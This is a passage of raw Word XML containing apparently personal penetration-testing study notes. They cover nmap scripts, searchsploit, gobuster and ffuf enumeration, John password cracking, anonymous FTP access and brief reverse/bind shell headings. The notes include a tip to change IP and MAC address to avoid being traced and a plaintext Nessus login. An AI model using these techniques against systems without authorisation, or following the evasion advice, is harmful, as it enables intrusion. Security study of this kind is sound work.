      <w:r w:rsidRPr="006133B2">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">/scripts </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA22282" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">To find out what that script does you can type // Some useful ones are </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20129930" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> --script-help (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>-geolocation-map-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>google.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048B969D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>firewall-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>bypass.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">: tries to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>baypass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> firewall to find more port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1DC625" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">                https://metasploit.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634773B9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>|_________________________________________ftp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>anon.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">: tries to see if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>anonomous</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> login is allowed on the port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472F6AD4" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="01223311" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">make sure to specify the type of scan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>aswell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> using the commands above </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180DC3CF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="631D8B41" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Manual Exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7424A6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>To manually find exploit we can search the version the machine is running on google and search for exploit. // Would recommend changing IP and MAC address when doing so if serious.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AEE958" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> is a tool that goes through kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>linux's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> database to see if there is any current </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>exploites</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> running on the version you typed </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423AA451" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> ISC BIND 9.4.2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE9EFA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>If exploit is found you can use the locate command to find where this exploit is located on our machine // can use nano to open and look through the tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E5B7B5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="74C58141" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Information gathering guide </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FC8709" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- netstat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD537D1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CB14B5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="54E63E0B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FE7011E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C229C8F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> - can use domain names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DD10C9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> // -v always // can be used with domains also</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D9CC27" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="3379EBE8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> guide (since I always forget)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675BE0F2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">-x allows us to specify file extensions | For Example: -x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>php,html,txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4AD1908F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -wordlist /usr/lib/python3/dist-packages/theHarvester/data/wordlists/dns-names.txt -u $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64A3A653" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">This is for searching a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> for any directories inside the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753098F6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="64691B43" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Discovering subdomains using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F47C9F5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -u "$URL" -H "Host: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>FUZZ.$hostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>.***" -w /usr/share/seclists/SecLsts-master/Discovery/DNS/subdomains-top1million-5000.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701B9611" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Brute Force Password Breaking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D58F0C0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">John </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818E938" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>ex. john --format=crypt --wordlist='Cracked password.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB7B960" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">-ALWAYS PUT FORMAT FIRST </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294F5BE9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="6485D0C9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">can also use an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>auxillary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> module for ssh login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA7925F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="43A7412B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Ftp guide </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027BF5CD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Ex. ftp 192.168.1.167</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68917184" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">FTP COMMAND SHOULD ONLY BE USED ON INTERNAL NETWORKS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBCD010" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>IF YOU WANT TO CONNECT TO A REMOTE OR PUBLIC FTP SERVER US sftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C86D101" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Can be used for anon logins by using the following: Ex. Username: anonymous Password: (really anything but) password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0CC902" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">helps us remote </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>logonto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> a machine // WARNING: All Transfers Are Listed In Clear Plain Text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34885407" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="6D0C6596" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>To Uploading files use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA20B8E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Put: this allows us to upload files from one computer to the server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A1F4F7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Ex. put portscanner.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3F9248" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="07DB92E0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Retrive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> Files Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E5021" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>get: allows us to transfer files back from the server to our computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D74B0AC" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Ex. get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>gc.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50AA702E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="359E694E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To delete files use </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193AB1F3" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">delete or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>mdelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> *() to delete more than one file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC97E3B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>mdelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> *.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFC9E28" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="254C6722" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Nessus Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1D4DE7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Login: Thag4 Password: Womp1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22428CDB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Network Scanning CAN TAKE A LONG TIME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2283CC" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="3D272BEF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="22CD4F5C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Exploitation Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396A469A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="3D23550B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">telnet vulnerabilities </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F824B55" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- only works due to information </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>discolure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1490C889" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- needs authentication // these are rare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1169DC48" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Ex. telnet (Ip address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25346596" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="662A0481" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Netbios-ssn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74FBC0F8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">on port 139 and 445 we have a version between </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>smd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> 3.X - 4.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7926F0D0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- you can use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>auxillary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> module to find the version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F14C2E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="75045AD9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Reverse shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431E2461" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- makes a computer try a reverse connection to connect to our port on our kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7666664A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="516F28E8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Bind shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30812838" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
